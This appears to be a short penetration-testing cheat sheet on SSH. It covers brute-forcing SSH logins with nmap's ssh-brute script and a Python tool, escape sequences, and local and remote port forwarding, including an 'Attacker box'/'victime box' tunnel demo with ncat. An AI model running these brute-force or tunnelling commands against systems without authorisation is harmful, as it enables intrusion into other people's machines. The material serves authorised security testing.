Ssh
Test SSH authentication
Using nmap
nmap -p 22 --script ssh-brute --script-args userdb=users.txt,passwd=passwords.txt <TARGET>
Using python script
TODO: Chose to create a github repos or a single gist…
git clone https://github.com/kalidor/gossh.py
gist get gossh.py
./gossh.py -U users.lst -P passwds.lst targets.lst -p 22
Tunnels
Dynamic forward
[prompt]%
[prompt]% ~?
Supported escape sequences:
~. - terminate connection (and any multiplexed sessions)
~B - send a BREAK to the remote system
~C - open a command line
~R - request rekey
~V/v - decrease/increase verbosity (LogLevel)
~^Z - suspend ssh
~# - list forwarded connections
~& - background ssh (when waiting for connections to terminate)
~? - this message
~~ - send the escape character by typing it twice
[prompt]%
[prompt]% ~C
ssh> ?
Commands:
-L[bind_address:]port:host:hostport Request local forward
-R[bind_address:]port:host:hostport Request remote forward
-D[bind_address:]port Request dynamic forward
-KL[bind_address:]port Cancel local forward
-KR[bind_address:]port Cancel remote forward
-KD[bind_address:]port Cancel dynamic forward
Local forward
ssh -L XXXX:WEBISTE.FR:443 SSH_SERVER -i id_rsa -l USER
- XXX: local port where the port 443 will be reachable
- WEBSITE.FR: website i wanna access to
- 443: port the website is listening to
- USER: SSH user
We can now doing the following to get access WEBSITE.FR:443 through SSH tunnel:
curl https://localhost:XXXX
Or i can add into /etc/hosts:
W.X.Y.Z WEBSITE.FR
And I can now do:
curl https://WEBSITE.FR:XXXX
Cancel Remote port:
~C
-KL [LISTENING PORT]
Remote Forwarding
ssh -R XXXX:127.0.0.1:1111 SSH_SERVER -i id_rsa -l USER
- Attacker box
ncat -nlvp 1111 - victime box
echo plop | nc 127.0.0.1 XXXX - Attacker box received ‘plop’
Cancel Remote port:
~C
-KR [LISTENING PORT]